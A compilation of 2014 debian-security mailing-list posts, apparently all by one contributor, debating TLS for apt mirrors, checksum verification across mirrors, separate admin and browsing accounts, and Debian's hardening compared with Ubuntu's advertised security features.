 For years I have been concerned with MITM attacks on Debian mirrors.

 [...]

Hate to trivialize your concerns, but the Debian organization cannot
control the mirrors people provide it and remain Debian.

You have to remember that when even proposing problems, much less solutions.

 However, what if http://cdimage.debian.org/ is actually an NSA mirror site 
 and not the real one?
 [...]

When I download a new install image, I pretty much always go to random
mirrors, some largish/mainish and some smalish/obscure and download
the copies of the checksum files. If all the checksum files compare, I
can be pretty confident that one of the following conditions exists:

(1) The image is good if the checksum command reports the correct checksum.

(2) Some attacker has compromised every mirror I have accessed.

(3) Some attacker is doing deep inspections on my traffic and
redirecting traffic every time I go looking for a debian mirror.

I check a minimum of three mirrors, but when I'm feeling especially
paranoid I'll check five or six.

It occurs to me that I might cede some usefulness to having the
checksums (not images) served TLS transport on at least one of the
mirrors, if and only if I remember to set the SSL_CERT_FILE before I
fire up lynx to go get the checksums. It won't help me if my
randomness in choosing the servers isn't good enough in case (2), but
it should help in case (3).

-- 
Joel Rees

Computer storage is just fancy paper,
and the CPU and I/O are just a fancy pens


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iM+6AYc1owhZty+kR55VaXkOP8zd=y7u4vntv0ceco...@mail.gmail.com

the calculus of encrypting non-textual data (was Re: concrete steps for improving apt downloading security and privacy)

[Joel Rees]

On Tue, Jul 8, 2014 at 5:13 AM, Andrea Zwirner and...@linkspirit.org wrote:
 On 07/07/2014 13:09, Joel Rees wrote:

 Sorry Joel, I almost totally disagree with your vision on privacy and
 security, but I really i don't want to go into the merit of it, because
 I think Lou is representing my vision already; I only have a question:

 Did you know that encrypting a picture sometimes results in a picture
 that looks like it has been through a random color-permuting filter?

 Can you proof it?

Memory of coursework in encryption. The professor did some simple
encryption on uncompressed images and showed how the results tended
not to hide the things one would want hidden.

Then he pointed out that the parts of an image with the most
information are the parts that are least likely to compress. And he
pointed out that standard encryption methods tend to be byte-oriented,
for speed.

He did not require us to do any homework on it, so I don't have any
special tools in my notebooks. 30 years ago. Heh. The technology has
changed somewhat since then, but I recently read about some standard
encrypted sound files that were playable, noisy, but recognizable.
Same principle.

 Or maybe, you can tell the list what the attached image - that is
 encrypted with Moritz Muehlenhoff's and Florian Weimer's public keys -
 represent?

You'll note that I never said it could be done on every encrypted
image. I assume that, now the math has been pointed out to you, you
won't mind if I decline the challenge?

 Cheers (and thanks Mr. Moritz and Mr. Florian - who were the only I had
 in my keyring - to accept being the judges of the challenge). :-)

Give them my regards, and I hope they are not disappointed. I've got
other things to do.

  Andrea Zwirner


 Sent from my Sylpheed


-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43im8zdukxqmnej8_oqcjhreto0p_qtdhyiq5wilpzye...@mail.gmail.com

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

2014/07/07 11:32 Lou RUPPERT hims...@louruppert.com:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA512

 Joel Rees:
  On Sat, Jul 5, 2014 at 12:43 AM, Lou RUPPERT
  hims...@louruppert.com wrote:
  -BEGIN PGP SIGNED MESSAGE- Hash: SHA512
 
  Joel Rees:
  On Fri, Jul 4, 2014 at 11:44 AM, Hans-Christoph Steiner
  h...@at.or.at wrote:
  You don't need a warning when you are looking at un-encrypted
  data. You only need a warning if you are _sending_ un-encrypted
  data.

 Not true. If I'm looking at an https-enabled page, and elements
 included in the page are http-only, I want to know about it.

Why? By the time you're looking at it, there's nothing to do about
what has been sent in the clear.

 It means
 the site maintainer messed up, and potentially sensitive information
 is going in the clear despite being included from a web page that is
 https.

https is not a flag for TOP SECRET NSA PLAN FOR BACKDOORING THE
UNIVERSE'S COMPUTERS OHS NOES!

 It means a breach is potentially occurring and that I should
 stop what I'm doing if the information presented is sensitive.

Most of what is sent https is not even classified sensitive.

If I'm looking at a catalog page from a shoe store on my table,
connected via the phone network, getting close to my 2G cap for my
wireless router for the month. My battery's getting low. Do I want to
waste bandwidth and CPU cycles for TLS encoding, just for pictures of
shoes?

I suppose, if I'm looking for shoes for my wife's birthday, and it's
supposed to be a surprise, and she regularly analyzes the house's
router logs to check whether the kids are going to pornofthemonth.xxx,
..., but that's not the wireless router, come to think of it. Does
your wife check your router logs? Okay, I suppose my son might, but,
seriously.

Oh, I suppose, if I were the kind of person to go to porn sites, I
might decide not to return to such a site that sent me it's bd
pics plaintext. (Did you know that encrypting a picture sometimes
results in a picture that looks like it has been through a random
color-permuting filter?)

Of course, if someone is tapping my stream and looking at the images
I'm looking at, they probably also know what sites I'm connecting to.

 What I
 don't want is a site that claims to be 'secure' while leaking.

Every site leaks. Secure pages that are blanket-sent TLS for the
wrong reasons will not be analyzed for leaks, because the people who
design the sight are unaware that TLS is not a big enough blanket.

  See how Microsoft has been complicit in this particular social
  engineering scheme from a long time ago? (I thought, back then,
  that they were just being lazy or trying to meet a stupid market
  window with incomplete tech again. Naive of me, yes.)

 Huh?

Content creators and site managers probably want a tool that will
highlight or red-circle elements on a page that are declared
plaintext, and (as a different option or command) elements that will
end up plaintext when the page is sent TLS. And they want the tool to
walk their site automatically, leaving a log behind.

Users want their browser to tell them when parts of the data in the
query they send TLS are going to be sent plaintext. Some may want to
know which elements are going to be sent plaintext. Some may want to
scan for plaintext elements before they start filling in the form, so
they don't waste their time. But they don't really care if the picture
of the shoe or its title is being received plaintext. Such information
is perceived as noise, unless they really are concerned about the off
chance that someone might be capturing their data stream to find out
what pictures or political rants they are accessing.

  Apple store or Play store would probably provide a more useful
  dataset for them anyway.
 
  But not so interesting, and not so constant. Sure, enough bits
  and pieces are separable to extract much of the constant part, but
  I don't think it's very interesting to the spooks. I mean, I think
  they already have what they need there pretty early on.

 We're talking about datasets used to factor keys, right?

Surely you see that is not all that we are talking about?

 If they want
 to perfect some secret squirrel factoring technique, there are plenty
 of popular candidates to use.

So, give them more data. Give them more of the hard data, in fact.

 We don't need to worry about debian
 repos becoming the key that allows them to develop that technique.

Really? I mean, the current encryptions will be broken sooner or
later. You're voting for sooner?

  I mean, yes, they are trying various ways to find the keys people
  are using, but those aren't the big fish. Especially since we have
  to assume that the hardware entropy generators in the CPUs for
  the most popular CPUs are pretty much under the control of one set
  of spooks or another.

 Yes, but except for freebsd's(?) mistake of using it exclusively,
 you'll find that OSes mix the entropy sources when providing
 /dev/random

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

On Fri, Jul 4, 2014 at 11:44 AM, Hans-Christoph Steiner h...@at.or.at wrote:

 [rhetoric encouraging the use of TLS transport for mirrors]
 [list of current https mirrors]

Far be it from me to argue with ucalgary.ca, but one thing that
bothers me about using TLS as a download transport is that, if I were
the spooks, and I wanted a huge sample of crypts from a known
plaintext, I could think of worse ways to go than to get the
opensource crowd to provide them for me.

I mean, yeah, they probably have the resources to simulate the debian
download infrastructure in their internal server farms, but why do
their work for them and free their resources up for other jobs?
Especially when the only real advantage of using TLS download
transport is (the illusion of) being able to download what you want
without them knowing exactly what you downloaded.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iOTxVcCGyh5+d4VA43279Np6cKm9=4sq-wl0a1v8j5...@mail.gmail.com

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

On Sat, Jul 5, 2014 at 12:43 AM, Lou RUPPERT hims...@louruppert.com wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA512

 Joel Rees:
 On Fri, Jul 4, 2014 at 11:44 AM, Hans-Christoph Steiner
 h...@at.or.at wrote:

 [rhetoric encouraging the use of TLS transport for mirrors] [list
 of current https mirrors]

 Far be it from me to argue with ucalgary.ca, but one thing that
 bothers me about using TLS as a download transport is that, if I
 were the spooks, and I wanted a huge sample of crypts from a known
 plaintext, I could think of worse ways to go than to get the
 opensource crowd to provide them for me.

 Any popular site with relatively static content would do that.

And you know, the funny thing is that MSIE took to warning people
when there was a mix of encrypted and unencrypted data on a page. How
long ago? Yeah, I know, it was so they could display that red herring
of a lock for secured pages.

You don't need a warning when you are looking at un-encrypted data.
You only need a warning if you are _sending_ un-encrypted data. See
how Microsoft has been complicit in this particular social engineering
scheme from a long time ago? (I thought, back then, that they were
just being lazy or trying to meet a stupid market window with
incomplete tech again. Naive of me, yes.)

 Apple
 store or Play store would probably provide a more useful dataset for
 them anyway.

But not so interesting, and not so constant. Sure, enough bits and
pieces are separable to extract much of the constant part, but I don't
think it's very interesting to the spooks. I mean, I think they
already have what they need there pretty early on.

 But if you configure it and the clients to favor
 ephemeral keys you reduce the usefulness of captured traffic in being
 able to simulate the server itself.

And give them even more to work from. Sure.

I mean, yes, they are trying various ways to find the keys people are
using, but those aren't the big fish. Especially since we have to
assume that the hardware entropy generators in the CPUs for the most
popular CPUs are pretty much under the control of one set of spooks or
another.

 I mean, yeah, they probably have the resources to simulate the
 debian download infrastructure in their internal server farms, but
 why do their work for them and free their resources up for other
 jobs?

 I'm not sure that's a realistic scenario.

Why not?

 Especially when the only real advantage of using TLS download
 transport is (the illusion of) being able to download what you
 want without them knowing exactly what you downloaded.

 Yeah they could probably infer it based on the session size.

Uhm, yeah, that's another trick they have available. But in many
cases, they don't even need to do that.

 They do
 that for other encrypted streams, like determining successful SSH logins.

 But TLS also serves as a sort of sloppy authentication mechanism,
 assuring you that someone someplace has vouched for the fact that
 you've connected to the system you intended to connect to. It's not
 terribly useful when you already sign your packages, but layers etc.

I myself use the argument of added low walls and speed bumps when we
are talking about skript k!dd13s, but low walls are not such a
wonderful strategy when we turn our attention to professionals. It's
pushing a metaphor, but a low wall can sometimes be another place for
a spook to hide.

As someone pointed out, verifying the mirror we've connected to is not
useful when we don't particularly have, or want, a way to prevent a
spook-owned mirror from joining the pool.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43iotff6hdoy7es4pv2jpjcw5zveukfcgpkhrk_n2e+1...@mail.gmail.com

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

On Sat, Jul 5, 2014 at 6:14 AM, Hans-Christoph Steiner h...@at.or.at wrote:

 [...]
 I'm with Lou on this one,

I'm not surprised.

 there are already much bigger and better data sets
 for that.

So we should give them even more?

 According to this paper[1], Fedora 11+, Red Hat, SUSE, Google
 updates like Chrome and Android tools, Adobe AIR, Firefox, Python pypi, and
 others all use HTTPS for their updates.

Pardon me for being obnoxious, but do you really need to refer to
someone else's research[1] for that little gem?

Well, I suppose, if we were on the user list, we might assume that
some of those participating might not be using those tools, or might
not be noticing what they are downloading. In which case, it would be
nice, if you were assuming such, to provide a
page/paragraph/table/etc. number, such as

Table 2, found in section 5, on p. 5 of
http://freehaven.net/~arma/tuf-ccs2010.pdf

(Or of https://isis.poly.edu/~jcappos/papers/samuel_tuf_ccs_2010.pdf.
I guess the reason you gave me two links to the same paper is so that
if one is unreachable we might be able to get to the other?)

  Debian is behind the curve here,

So we aren't fashionable?

 HTTPS for updates is becoming the norm.

Lemmings, everyone?

 Plus if the HTTPS it set up with
 Forward Secrecy ciphers, the keys are frequently rotated.

The MacGuffins?

But what is the Holy Grail for them? (Yeah, Holy Grails are also
MacGuffins, but keys are red herring-style MacGuffins here.)

 And on the flipside of Joel's argument, right now, the NSA tries to store as
 much encrypted data as possible.

They admit as much.

 That way when they get the key later, they
 can go back and decrypt old traffic.

Do we really think that's the only reason they store it?

 So generating more HTTPS traffic means
 they can't keep up as much.

Hmm. I wonder which they are going to have an easier time budgeting --
adding more off-line storage or adding more on-line CPUs+storage? You
do understand that emulating distribution networks takes CPUs?

 But this is probably not really important in this
 case since they would probably notice that the sites are mirrors and ignore
 the traffic.

???

 .hc

 [1] http://freehaven.net/~arma/tuf-ccs2010.pdf  or
 https://isis.poly.edu/~jcappos/papers/samuel_tuf_ccs_2010.pdf




-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iPovcP-xFj+RKJfeGh4u+YgYKRdRRFEkuw9o9hzAoj=l...@mail.gmail.com

Re: Please remove me from this list

[Joel Rees]

On Sat, Jun 28, 2014 at 12:45 AM, [...]
 I know, I am a jerk, but it was the first thing I thought of

 I don't think that makes you a jerk at all.

We are all jerks at times. It's part of being human and not
understanding the other guy's situation.

 IMHO one of the most
 serious deteriorations in our profession has been the rise of slapdash,
 non-technical, shoot-from-the-hip people to positions of power and
 control. Raising your eyebrows at this trend does not make you a jerk.
 It might make you humourless, but I'm sure that just applies to me :)

Trend?

Bill Gates?
Steve Jobs?

Trend, maybe, but nothing particularly new.

Managers manage by charisma more than by technical skill, even in the
best cases.

 [...]

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43imuuwazfrshefemdilmzku4rrpdapia8dbr8b0jk0i...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sat, May 17, 2014 at 8:44 PM, Patrick Schleizer adrela...@riseup.net wrote:
 Joel Rees:
 He told me to use Ubuntu instead. He explained that with the fact,
 that Ubuntu has more security features enabled than Debian (also
 more compiler flags for security) in a fresh install. He gave me a
 link to the following site:
 https://wiki.ubuntu.com/Security/Features


 That's a good list of all the currently fashionable security
 features for Linux. Some of the items in the list are meaningful,
 some are not. Most might be if you know what you are doing with them.
 None of the meaningful items in that list are unavailable on Debian,
 and the defaults are reasonably secure in Debian.

 The problem is, that Debian lacks a page similar to:
 https://wiki.ubuntu.com/Security/Features

Is that page really useful? I mean, besides as a sort of sales brochure?

 As you can see, that https://wiki.ubuntu.com/Security/Features page
 looks impressive to new users. I guess Debian is losing a few users to
 Ubuntu, because Debian does not have such a page.

I did note that the debian pages on security are a bit dated.

I suppose I should lend a hand there if I can find the time. How about
you, do you have the time? You don't have to start out understanding
the whole list, you just have to be willing to look up the debian
packages, learn how their setup works, and write down what you
learned, discuss it on the appropriate lists, then write up some
summaries and submit them. If you do good work, you'll be invited to
assume responsibility for some of the wiki pages.

 This will be an issue with any OS you
 choose, even seriously secure OSses like openBSD.

 Is OpenBSD a seriously secure OS?

I suppose it's easier to get into an openbsd server than it is to fly
to the moon, but if you set up an openbsd server and keep it updated,
attackers will generally find it easier to try social engineering
instead of attacking the server directly.

Modulo the services you run, but that's true of any OS. If you are
running a hypertext protocol server and it has a hole, you have a hole
in your server.

 Last time I checked, OpenBSD didn't provide signed packages for the
 package manager by default. Using OpenBSD signed packages for updating
 only seemed ridiculously complicated.

Basically, you're supposed to buy the CDs from the project. CDs are a
bit harder to spoof than dns, and they come out every six months.

 http://www.openbsd.org/faq/faq1.html:
 OpenBSD is thought of by many security professionals as the most secure
 UNIX-like operating system

 Well, for experts eventually, not for normal users!

There is no operating system that is secure for people who aren't
willing to learn how to admin the thing.

 And I am wondering
 which security professionals they are quoting and from when these quotes
 are.

Search the web.

 Do not surf the web as root or as any administrator login id, of
 course.

 Speaking of admin login ids, it's a good idea to have one non-root
 login id that you only use for administrative tasks. And you should
 avoid getting onto the web when logged in with the admin id. Which
 means you need another id for general use, which makes two strong
 passwords, three if you allow root login.

 After reading the following blog post

 http://theinvisiblethings.blogspot.fr/2011/04/linux-security-circus-on-gui-isolation.html

 it seems to me, that user account level isolation isn't very strong.

That's why you don't surf the web as an admin user.

There are lots of things I left out, to avoid dropping an elephant on
the list. One is that you should avoid X11 user switching in general,
and especially when you are doing admin work..

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43imw52ab6xtuf2imxtrerrdkrzylthb22cq2-nipccn...@mail.gmail.com

Re: Debians security features: Which are active?

[Joel Rees]

On Sat, May 17, 2014 at 7:38 PM, herzogbrigit...@t-online.de
herzogbrigit...@t-online.de wrote:
 Thank you for all your replies.
 I understand that the user is important for security, but it's a difference 
 whether you start from scratch or you can work with somethink prebuilt. So, 
 could you tell me, which of the following securit features are enabled in 
 Debian by default and which I have to activate manually:


Just curious, but did you click on any of these (or scroll down the page)?

For Debian, you can find a lot of your answers here:

https://wiki.debian.org/Hardening

You will note that a lot of these features are currently enabled by
default via the use of current gcc. That is, many of these things were
pioneered by various OSses, including Debian, then adopted into the
gcc compiler tools, and then tested again as the OSses brought the new
versions of gcc in.

 [...]

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iPSpZ_avA7d4-BWfLokjr22ioRN5tn�afhsbymhe...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

Heh. I took the bait on this one.

On Sat, May 17, 2014 at 8:44 PM, Patrick Schleizer adrela...@riseup.net wrote:
 Joel Rees:
 He told me to use Ubuntu instead. He explained that with the fact,
 that Ubuntu has more security features enabled than Debian (also
 more compiler flags for security) in a fresh install. He gave me a
 link to the following site:
 https://wiki.ubuntu.com/Security/Features


 That's a good list of all the currently fashionable security
 features for Linux. Some of the items in the list are meaningful,
 some are not. Most might be if you know what you are doing with them.
 None of the meaningful items in that list are unavailable on Debian,
 and the defaults are reasonably secure in Debian.

 The problem is, that Debian lacks a page similar to:
 https://wiki.ubuntu.com/Security/Features

 [...]

Scroll down that page to the bottom.

I'd say that lacks seems to be a bit of a strong word to use there.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iPOcda72JuhZofyKOcg6NM1=rnmj34mz931b0rwxyz...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sat, May 17, 2014 at 10:39 PM, Sven Bartscher
sven.bartsc...@weltraumschlangen.de wrote:
 On Sat, 17 May 2014 11:44:56 +
 Patrick Schleizer adrela...@riseup.net wrote:

 After reading the following blog post

 http://theinvisiblethings.blogspot.fr/2011/04/linux-security-circus-on-gui-isolation.html

 it seems to me, that user account level isolation isn't very strong.

 A very helpful link. I wasn't aware of that problem until now.
 Is there anything I can do against this, without using two different
 users? Are there any plans on changing this behaviour?

There are more reasons than the X11 hole to refrain from using your
admin user to surf the web.

If you are worried about needing to find answers to admin problems by
searching the web, lynx helps somewhat. But I still restrict the
places I visit with lynx while running as an admin to my search engine
site, certain subdomains of debian.org, and such.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iMn2QnuB28=hrq+jf_ngwkof4md1zpph79kte_resg...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sun, May 18, 2014 at 12:34 AM, Richard van den Berg
rich...@vdberg.org wrote:
 Joel Rees wrote On 17-05-14 03:19:

 He gave me a link to the following site:
 https://wiki.ubuntu.com/Security/Features

 None of the meaningful items in that list are unavailable on Debian, and

 the defaults are reasonably secure in Debian.


 I might be misinterpreting your definition of meaningful, but I have been
 looking for a public entropy source for my Debian system for quite a while.
 If you can point me to the Debian equivalent of pollinate and
 https://entropy.ubuntu.com/ that would be highly appreciated.


Hmm. Early boot has problems getting enough randomness (for what?), so
let's go get some randomness from a server somebody in the Ubuntu
project set up.

Pardon me for being cynical, but what could go worng?

But the client is supposed to be 50 lines of golang, is it not?

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iMberAfPyOnx91eXj-AJQeF1SO+O=w_68txw4zkmbi...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sat, May 17, 2014 at 11:18 PM, Reid Sutherland r...@vianet.ca wrote:

 That's a good list of all the currently fashionable security
 features for Linux. Some of the items in the list are meaningful,
 some are not. Most might be if you know what you are doing with them.
 None of the meaningful items in that list are unavailable on Debian,
 and the defaults are reasonably secure in Debian.

 The problem is, that Debian lacks a page similar to:
 https://wiki.ubuntu.com/Security/Features

 As you can see, that https://wiki.ubuntu.com/Security/Features page
 looks impressive to new users. I guess Debian is losing a few users to
 Ubuntu, because Debian does not have such a page.



 Again, Debian is not in the business of handholding new Linux users, nor 
 should it be.  Debian is a foundation for targeted systems.


Just for the record,

https://wiki.debian.org/Hardening

Yeah, I missed that at first, too. Sorry.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43ioisau6sian7jng6n_htxsvt2sbpw9rzkyvct+ardx...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sun, May 18, 2014 at 1:24 AM, Sven Bartscher
sven.bartsc...@weltraumschlangen.de wrote:
 On Sun, 18 May 2014 01:09:06 +0900
 Joel Rees joel.r...@gmail.com wrote:

 On Sat, May 17, 2014 at 10:39 PM, Sven Bartscher
 sven.bartsc...@weltraumschlangen.de wrote:
  On Sat, 17 May 2014 11:44:56 +
  Patrick Schleizer adrela...@riseup.net wrote:
 
  After reading the following blog post
 
  http://theinvisiblethings.blogspot.fr/2011/04/linux-security-circus-on-gui-isolation.html
 
  it seems to me, that user account level isolation isn't very strong.
 
  A very helpful link. I wasn't aware of that problem until now.
  Is there anything I can do against this, without using two different
  users? Are there any plans on changing this behaviour?

 There are more reasons than the X11 hole to refrain from using your
 admin user to surf the web.

 Just out of curiosity, what are these reasons?

Your browser and any plugins, addons, etc. that it loads, including
java, flash, java/ecmascript, and, well, any scripting language the
browser can be running, for starters.

Shoot, if my memory serves me, I seem to remember a class of
vulnerabilities that has never really been answered, involving pushing
keyboard loggers into the keyboard controller itself.

 If you are worried about needing to find answers to admin problems by
 searching the web, lynx helps somewhat. But I still restrict the
 places I visit with lynx while running as an admin to my search engine
 site, certain subdomains of debian.org, and such.

 I'm not only worried about my admin account.
 This is still a big security-hole for non-admins.

The web is not safe. If you do internet banking, at least make a
separate, dedicated account for that, too. And if you go places where
maybe you should not let you go, re-think your reasons for going.

I get a lot of flack for such suggestions, but I'm not going to tell
you soft stories.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43in3xzmh9wfmuwkujtbkhdj1gervb2uq5hvbnxd7wgt...@mail.gmail.com

Re: Dedicated admin account (was Re: Debians security features in comparison to Ubuntu)

[Joel Rees]

On Sun, May 18, 2014 at 1:50 AM, Sven Bartscher
sven.bartsc...@weltraumschlangen.de wrote:
 On Sun, 18 May 2014 01:36:44 +0900
 Joel Rees joel.r...@gmail.com wrote:

  There are more reasons than the X11 hole to refrain from using your
  admin user to surf the web.
 
  Just out of curiosity, what are these reasons?

 Your browser and any plugins, addons, etc. that it loads, including
 java, flash, java/ecmascript, and, well, any scripting language the
 browser can be running, for starters.

 Shoot, if my memory serves me, I seem to remember a class of
 vulnerabilities that has never really been answered, involving pushing
 keyboard loggers into the keyboard controller itself.

  If you are worried about needing to find answers to admin problems by
  searching the web, lynx helps somewhat. But I still restrict the
  places I visit with lynx while running as an admin to my search engine
  site, certain subdomains of debian.org, and such.
 
  I'm not only worried about my admin account.
  This is still a big security-hole for non-admins.

 The web is not safe. If you do internet banking, at least make a
 separate, dedicated account for that, too. And if you go places where
 maybe you should not let you go, re-think your reasons for going.

 So basically I would need one account for surfing, one for
 online-banking, ssh(-agent) and other important stuff and an
 admin-account. Some accounts I missed?

 I know that's not gonna help, but I fell like there should be a better
 way to isolate processes.

There are some experiments in sandboxing in the browser, other, more
general experiments in sandboxing apps in general. Somebody mentioned
Qube or some such.

Openbsd is partially mitigating the X11 hole with some interesting stuff.

I have a poor-man's sandbox that I blogged about several years back,
but I got it wrong relative to X11, if I remember right. I suppose I
should do some testing and update my blog, but nobody's read that post
in the last year, I think. But that method, involving sudo, does, at
least, isolate the javascript code and the cookies.

If you have a million dollars to front a project for the next three
years and feed me and my family and about ten developers, I might be
able to produce a Linux or BSD derivative that allows you to log in as
one user and fire up ephemeral users for tasks. The bulk of the
development is going to go into isolating the video buffers, I think.
And the resulting video will be slow, probably won't be able to use
most of the current hardware acceleration.

I jest. I have other things I want to do.

Cheaper and quicker to just get used to separating what you do and how
you log in.

Well, xen or one of the other VMs might help. But I'm not sure even
those will properly isolate the video buffers to avoid
screen-scraping.

 PS: Please don't CC me

Sorry about that. I usually remember to delete the sender. Too lazy to
set up a proper MUA for mailing list access.

-- 
Joel Rees

Computer memory is just fancy paper,
the cpu and i/o are just fancy pens.
This is not the magic you are looking for.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43ios-hxrketyaymyetxcgux33ym59_v5m5evn3m-+v7...@mail.gmail.com

Re: Debians security features: Which are active?

[Joel Rees]

So, ...

On Sun, May 18, 2014 at 2:32 AM, herzogbrigit...@t-online.de
herzogbrigit...@t-online.de wrote:

 Paul Wise recently started a thread on this mailing list:

 goals for hardening Debian: ideas and help wanted

 What about making a wiki page in Debian wiki listing what's

 implemented with references?

 If you wish, I can try to start that table. I would be interested

 myself what's implemented.

 Yes it would be great if you can start with such a page. Use the Ubuntu
 table as a template to start. I'll try to help as much as I can in the wiki.
 Many Linux-Distros have a security features page in their wikis. So why not
 also Debian?

Has anyone yet noticed this page:

https://wiki.debian.org/Hardening

It's linked from the Ubuntu page that Brigette started with, and shows
up fairly high in google searches.

You probably won't think it's sufficient, but it would be a great
place to start from.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43io0ufd3hrp+vbqyqq5ovm1bzairz+bm8hnkahat4d2...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sat, May 17, 2014 at 6:41 AM, Reid Sutherland r...@vianet.ca wrote:
 [response shifted to conversational format]
 On May 16, 2014, at 3:38 PM, herzogbrigit...@t-online.de wrote:

 Hello there,
 I'm a new user of the great Debian distro for my Desktop. But when I talked 
 to a friend and I told him, that I'm using Debian (Wheezy) for my desktop 
 computer, he told me that I shoudn't use it because it is not secure. He 
 told me to use Ubuntu instead. He explained that with the fact, that Ubuntu 
 has more security features enabled than Debian (also more compiler flags for 
 security) in a fresh install. He gave me a link to the following site:
 https://wiki.ubuntu.com/Security/Features

 So, I'm very happy with Debian but because my friend seems to be an expert 
 for Linux, I don't know if I can use Debian. Can you tell me which of the 
 security features promoted by Ubuntu are also enabled in Debian?

 Thank you very much!

 Brigitte Herzog

 From my view, Debian is designed to be flexible and does not impose any 
 unnecessary features on the user.  For this reason, I find it is best for new 
 users to operate distributions that are more targeted to their needs.  
 Distributions such as Ubuntu come with reasonable defaults for the market 
 they are supporting (desktop / office users in this case), while Debian is 
 more of a base system offering “factory” defaults that are usually customized 
 by more experienced users.  The same idea can apply to the various security 
 layers added to the system, Ubuntu may activate these layers by default, 
 while Debian will defer these decisions to the user.



While there is a point to the idea that distros like Ubuntu and Mint
are set up more oriented towards the beginner or the user who doesn't
want to waste time on system administration, it is highly
questionable whether certain of the added security features actually
increase security.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iNaDfhpRZ_w=tcennddh7wl++6kzpcs+t3w8mdx1jr...@mail.gmail.com

Re: Debians security features in comparison to Ubuntu

[Joel Rees]

On Sat, May 17, 2014 at 4:38 AM, herzogbrigit...@t-online.de
herzogbrigit...@t-online.de wrote:
 Hello there,
 I'm a new user of the great Debian distro for my Desktop. But when I talked 
 to a friend and I told him, that I'm using Debian (Wheezy) for my desktop 
 computer, he told me that I shoudn't use it because it is not secure.


Maybe he meant that he didn't figure you could secure your Debian
system as well as Ubuntu secures the Debian system for some definition
of average user. (Are you the average user that the Canonical team
imagines?)

Otherwise, he was telling you that Ubuntu is secure even though the
foundation of Ubuntu is not.

Which is not the case, at any rate.

 He told me to use Ubuntu instead. He explained that with the fact, that 
 Ubuntu has more security features enabled than Debian (also more compiler 
 flags for security) in a fresh install. He gave me a link to the following 
 site:
 https://wiki.ubuntu.com/Security/Features


That's a good list of all the currently fashionable security
